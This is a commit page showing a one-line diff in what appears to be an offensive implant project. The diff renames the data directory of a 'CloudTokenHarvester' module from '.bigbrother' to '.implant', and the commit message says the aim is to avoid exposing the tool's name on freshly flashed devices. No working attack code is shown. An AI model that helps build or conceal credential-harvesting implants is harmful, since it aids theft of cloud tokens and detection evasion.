Replace .bigbrother with .implant in all identity strings — avoid tool name exposure on fresh flash
This commit is contained in:
@@ -277,7 +277,7 @@ class CloudTokenHarvester(BaseModule):
|
||||
|
||||
def _resolve_db_path(self) -> str:
|
||||
base = self.config.get("db_dir", os.path.join(
|
||||
os.path.expanduser("~"), ".bigbrother"
|
||||
os.path.expanduser("~"), ".implant"
|
||||
))
|
||||
return os.path.join(base, "cloud_token_harvester.db")
|
||||
|
||||
|
||||
Reference in New Issue
Block a user